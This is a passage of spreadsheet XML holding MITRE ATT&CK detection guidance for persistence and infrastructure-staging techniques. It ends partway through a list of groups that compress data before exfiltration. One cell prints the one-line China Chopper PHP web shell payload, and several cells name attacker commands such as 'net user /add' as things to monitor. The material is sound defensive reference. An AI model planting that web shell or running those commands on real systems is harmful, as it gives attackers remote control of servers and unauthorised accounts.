    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns)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t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected changes to RC scripts in the &lt;code&gt;/etc/&lt;/code&gt; directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.
Monitor for &lt;code&gt;/etc/rc.local&lt;/code&gt; file creation. Although types of RC scripts vary for each Unix-like distribution, several execute &lt;code&gt;/etc/rc.local&lt;/code&gt; if present. </t>
  </si>
  <si>
    <t xml:space="preserve">Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: &lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt; On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;
On macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the &lt;code&gt;kext_policy&lt;/code&gt; table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, &lt;code&gt;/var/db/SystemPolicyConfiguration/KextPolicy&lt;/code&gt;.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
</t>
  </si>
  <si>
    <t>Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) 
&lt;code&gt;&amp;lt;?php @eval($_POST['password']);&amp;gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)
File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)
Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</t>
  </si>
  <si>
    <t>Monitor for the creation of the Office Test Registry key. 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 Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Consider monitoring Office processes for anomalous DLL loads.</t>
  </si>
  <si>
    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</t>
  </si>
  <si>
    <t>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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)</t>
  </si>
  <si>
    <t>Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to &lt;code&gt;%windir%\system32\inetsrv\config\applicationhost.config&lt;/code&gt; could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)
Monitor execution and command-line arguments of &lt;code&gt;AppCmd.exe&lt;/code&gt;, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior</t>
  </si>
  <si>
    <t>Monitor for changes to Registry keys associated with &lt;code&gt;ServiceDll&lt;/code&gt; and other subkey values under &lt;code&gt;HKLM\System\CurrentControlSet\services\TermService\Parameters\&lt;/code&gt;.
Monitor unexpected changes and/or interactions with &lt;code&gt;termsrv.dll&lt;/code&gt;, which is typically stored in &lt;code&gt;%SystemRoot%\System32\&lt;/code&gt;.
Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.
Monitor module loads by the Terminal Services process (ex: &lt;code&gt;svchost.exe -k termsvcs&lt;/code&gt;) for unexpected DLLs (the default is &lt;code&gt;%SystemRoot%\System32\termsrv.dll&lt;/code&gt;, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).</t>
  </si>
  <si>
    <t>Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with domain account creation, such as &lt;code&gt;net user /add /domain&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with local account creation, such as &lt;code&gt;net user /add&lt;/code&gt; , &lt;code&gt;useradd&lt;/code&gt; , and &lt;code&gt;dscl -create&lt;/code&gt; . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary. For network infrastructure devices, collect AAA logging to monitor for account creations.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for new files added to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder. The System LaunchDaemons are protected by SIP.
Some legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to true, ensure the &lt;code&gt;Program&lt;/code&gt; parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as &lt;code&gt;Program&lt;/code&gt; and &lt;code&gt;ProgramArguments&lt;/code&gt; parameters but one must be present.(Citation: launchd Keywords for plists)
</t>
  </si>
  <si>
    <t>Monitor Registry key additions and/or modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>All login items created via shared file lists are viewable by using the System Preferences GUI or in the &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt; file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.
Otherwise, login Items are located in &lt;code&gt;Contents/Library/LoginItems&lt;/code&gt; within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)
Monitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.</t>
  </si>
  <si>
    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</t>
  </si>
  <si>
    <t xml:space="preserve">With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. </t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. 
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor file creation and modification events of Systemd service unit configuration files in the default directory locations for `root` &amp; `user` level permissions. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the `root` user.(Citation: lambert systemd 2022) 
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: `systemctl list-units -–type=service –all`. Analyze the contents of `.service` files present on the file system and ensure that they refer to legitimate, expected executables, and symbolic links.(Citation: Berba hunting linux systemd)
Auditing the execution and command-line arguments of the `systemctl` utility, as well related utilities such as `/usr/sbin/service` may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>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</si>
  <si>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Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Monitor for access to S3 buckets, especially those that are not intended to be publicly accessible.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</si>
  <si>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Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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</si>
  <si>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Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).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</si>
  <si>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Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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</si>
  <si>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Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.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</si>
  <si>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Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).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</si>
  <si>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Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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</si>
  <si>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In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).</t>
  </si>
  <si>
    <t>Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).</t>
  </si>
  <si>
    <t>Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).</t>
  </si>
  <si>
    <t xml:space="preserve">
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits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</si>
  <si>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Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities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</si>
  <si>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Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits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</si>
  <si>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Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that will aid in compression or encrypting data that is collected prior to exfiltration, such as tar. 
File Creation
Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.
Process Creation
Monitor for newly constructed processes and/or command-lines that aid in compression or encrypting data that is collected prior to exfiltration, such as 7-Zip, WinRAR, and WinZip.  
Script Execution
Monitor for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Audit
System scans can be performed to identify unauthorized archival utilities.
APT28
[APT28](https://attack.mitre.org/groups/G0007) used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.(Citation: DOJ GRU Indictment Jul 2018)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has used LZMA compression and RC4 encryption before exfiltration.(Citation: ESET OceanLotus Mar 2019)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has compressed and encrypted data prior to exfiltration.(Citation: Novetta-Axiom)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has compressed data into .zip files prior to exfiltration.(Citation: US-CERT TA18-074A)
FIN6
Following data collection, [FIN6](https://attack.mitre.org/groups/G0037) has compressed log files into a ZIP archive prior to staging and exfiltration.(Citation: FireEye FIN6 April 2016)
Ke3chang
The [Ke3chang](https://attack.mitre.org/groups/G0004) group has been known to compress data before exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2. (Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has archived victim's data prior to exfiltration.(Citation: CISA AA21-200A APT40 July 2021)
LuminousMoth
